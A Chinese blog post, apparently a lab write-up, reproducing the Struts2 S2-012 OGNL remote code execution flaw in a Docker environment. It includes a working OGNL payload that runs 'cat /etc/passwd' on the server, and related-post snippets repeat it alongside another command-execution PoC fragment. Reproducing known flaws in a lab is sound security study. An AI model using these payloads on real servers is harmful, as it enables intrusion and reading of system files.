s2-012远程代码执行漏洞

最新推荐文章于 2024-01-10 17:04:11 发布
原创 最新推荐文章于 2024-01-10 17:04:11 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入剖析Struts2框架中的S2-012漏洞,该漏洞允许攻击者通过恶意OGNL表达式执行任意命令。文章详细描述了漏洞的触发条件、受影响版本及复现步骤。

一、漏洞描述:

   如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量

xml
<package name="S2-012" extends="struts-default">
    <action name="user" class="com.demo.action.UserAction">
        <result name="redirect" type="redirect">/index.jsp?name=${name}</result>
        <result name="input">/index.jsp</result>
        <result name="success">/index.jsp</result>
    </action>
</package>
```

这里 UserAction 中定义有一个 name 变量,当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。
   

     影响版本

    2.1.0 - 2.3.13

二、搭建环境

    kali里使用docker搭建

三、漏洞复现

    访问ip+8080端口(ip为环境搭建系统的ip)

  

可执行的poc:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

注意:这里面需要url编码,这个可以直接将poc复制到搜索框里,然后抓包,直接就url编码啦

四、查看日志

 

 

S2-048 远程代码执行漏洞(CVE-2017-9791)
Biu_Biu_Bi的博客
07-12 1052
S2-048 远程代码执行漏洞(CVE-2017-9791)
复现S2-045远程代码执行漏洞
weixin_67813445的博客
03-28 317
Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。
S2-012 远程代码执行漏洞
EC_Carrot的博客
08-09 393
漏洞简介 影响版本: 2.1.0 - 2.3.13 详细请到:https://github.com/vulhub/vulhub/blob/master/struts2/s2-012/README.zh-cn.md 漏洞复现 提交以下poc即可运行命令: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInpu
S2-012 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 3141
前言 漏洞环境改自vulhub的,环境地址 https://github.com/kingkaki/Struts2-Vulenv/tree/master/S2-012 漏洞信息 https://cwiki.apache.org/confluence/display/WW/S2-012 当发生重定向时,OGNL表达式会进行二次评估,导致之前在S2-003、S2-005、S2-009进...
漏洞复现----32、Struts2/S2-012
七天
06-29 754
文章目录一、漏洞原理二、环境启动三、漏洞复现 一、漏洞原理 在S2-003、005、009解决了参数名称及参数值处OGNL 表达式评估问题,其修复方案也是基于将可接受的参数名称列入白名单并拒绝对参数中包含的表达式进行OGNL解析,如此一来,这些修复动作也仅对部分漏洞有效果。 S2-012中,包含特制请求参数的请求可用于将任意 OGNL 代码注入属性,然后用作重定向地址的请求参数,这将导致进一步评估。当重定向结果从堆栈中读取并使用先前注入的代码作为重定向参数时,将进行第二次评估。这使恶意用户可以将任意 O
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
复现S2-052远程代码执行漏洞
NLXHBM的博客
04-18 755
1.启动环境 docker-compose up -d 2.查找Ubuntu ip 3.burpsuite进行抓包 4. 发送以下数据包 POST /orders/3 HTTP/1.1 Host: 192.168.81.168:8080 Content-Length: 2419 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.81.168:8080 Conten..
[漏洞复现]Apache Struts2/S2-012 RCE(CVE-2013-1965)
最新发布
k5664524的博客
01-10 673
Apache Struts Showcase App 2.0.0 到 2.3.13(在 2.3.14.3 之前的 Struts 2 中使用)允许远程攻击者通过在调用重定向时未正确处理的精心设计的参数名称执行任意 OGNL 代码。
[旧文系列] Struts2历史高危漏洞系列-part3:S2-012/S2-013/S2-015
mole_exp的博客
01-18 1646
文章目录关于<旧文系列>前言S2-012漏洞复现与分析可回显PoC漏洞修复S2-013漏洞复现与分析可回显PoC漏洞修复S2-015漏洞复现与分析Vuln-1: Wildcard matchingVuln-1 可回显PoCVuln-2:Double evaluation of an expressionVuln-2 可回显PoC漏洞修复针对 Vuln-1:Wildcard matching 的漏洞修复针对 Vuln-2:Double evaluation of an expression 的漏洞
Struts2 S2-012复现
ZJT6666666的博客
12-22 297
Struts2 S2-012复现
s2系列——s2-012,s2-013,s2-015,s2-016
qq_54030686的博客
03-03 4133
struts系列漏洞不在复现,插入payload即可,更换想要执行的命令即可,相关payload在vulhub中的readme.md文档中可以获取到,由于逻辑都一样,利用脚本直接使用github的struts.py即可 s2-012 ```go ```go ```go ```python def s2012(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http
struts2远程S2-012复现学习
hklearner的博客
04-02 3808
S2-012复现 原理: 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,UserAction 中定义有一个 name 变量,当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。 影响版本:Struts 2.1.0-2.3.13 <package name="S2-012" ext
java struts2 漏洞复现合集
whatday的专栏
08-31 9580
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
S2-012远程代码执行(CVE-2013-1965)
m0_65150886的博客
01-09 825
在Struts2框架中,如果配置Action中的Result时使用了重定向类型,并且还使用${param_name}作为重定向变量,当触发redirect类型返回时,Struts2使用${param_name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行。如此即可继承Web服务器程序的权限,去执行系统命令或读写文件,通过反弹shell控制整个网站,甚至控制整个服务器。1.访问http://ip:port,出现如下页面,开始实验。
struct2(S2漏洞poc合集以及对应版本
weixin_46626737的博客
08-11 1731
{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}(后有一个换行符)在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞
struts漏洞总结
Fiverya的博客
01-17 7350
struts2漏洞,从S2-001到 S2-061,嘿嘿。
S2-052远程代码执行漏洞
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值